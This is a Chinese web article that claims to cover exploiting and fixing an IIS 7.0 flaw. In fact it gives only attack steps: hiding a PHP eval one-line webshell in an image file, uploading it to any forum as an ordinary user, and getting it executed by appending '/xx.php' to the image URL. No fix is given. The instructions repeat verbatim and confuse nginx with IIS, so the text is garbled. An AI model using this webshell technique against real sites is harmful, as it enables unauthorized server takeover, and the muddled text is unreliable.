IIS 7.0 网站漏洞利用及修复方法
网络安全 2021-07-03 10:02www.168986.cn网络安全知识
以目前流行的PHP为例
先合并一张PHP一句话图片马,合并方法
①、DOS合并copy 1.gif /b + 1.txt/a php.gif
②、用edjpg,进行图片和一句话木马的合并,一句话代码为<?php eval($_POST[meckun]);?>
图片随便找一张.
【顺带着说一下edjpg的使用方法打开edjpg.exe所在文件夹,然后把你所要修改的图片拖动到edjpg.exe上面,然后edjpg.exe会自动打开,写入想要些的代码即可。
一句话:
<?php eval($_POST[meckun]);?>
然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。
找到图片地址,然后在地址后面加个xx.php,在浏览器中运行。
比如假设图片地址为.meckun./upload/1.jpg
则执行地址为.meckun./upload/1.jpg/xx.php
然后,会在目录下生成xx.php。比如:.meckun./upload/x.php
x.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。
找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。
在图片格式后面添加xx.php
注xx随便你怎么填。只要后缀为.php就好
先合并一张PHP一句话图片马,合并方法
①、DOS合并copy 1.gif /b + 1.txt/a php.gif
②、用edjpg,进行图片和一句话木马的合并,一句话代码为<?php eval($_POST[meckun]);?>
图片随便找一张.
【顺带着说一下edjpg的使用方法打开edjpg.exe所在文件夹,然后把你所要修改的图片拖动到edjpg.exe上面,然后edjpg.exe会自动打开,写入想要些的代码即可。
一句话:
<?php eval($_POST[meckun]);?>
然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。
找到图片地址,然后在地址后面加个xx.php,在浏览器中运行。
比如假设图片地址为.meckun./upload/1.jpg
则执行地址为.meckun./upload/1.jpg/xx.php
然后,会在目录下生成xx.php。比如:.meckun./upload/x.php
x.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。
找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。
在图片格式后面添加xx.php
注xx随便你怎么填。只要后缀为.php就好
上一篇:电脑开机速度慢怎么办 教你如何解决
下一篇:PHPWIND1.3.6论坛漏洞分析
网络安全培训
- 网络安全常见漏洞类型 网络安全常见漏洞类型包
- 绿色上网顺口溜七言 绿色上网的宣传标语
- 网络安全等级保护测评 网络安全等级保护条例
- 如何加强网络安全 网络安全隐患有哪些
- 网络安全防护措施有哪些 网络安全等级保护等级
- 如何保障网络安全 如何做好网络安全保障工作
- 维护网络安全的措施有哪些 维护网络安全的主要
- 网络安全工程师好学吗 2024年网络安全工程师好学
- 网络安全注意事项简短 网络安全注意事项100字
- 网络安全面临的挑战 当前网络安全面临的新问题
- 网络安全培训哪个靠谱 网络安全培训找哪个
- 普及网络安全知识内容 普及网络安全教育
- 网络安全防范知识宣传内容 网络安全防范知识宣
- 如何做好网络安全工作 如何做好网络安全工作
- 网络安全常识的丰富内容 网络安全的相关知识
- 青少年网络安全教育片 青少年网络安全知识讲座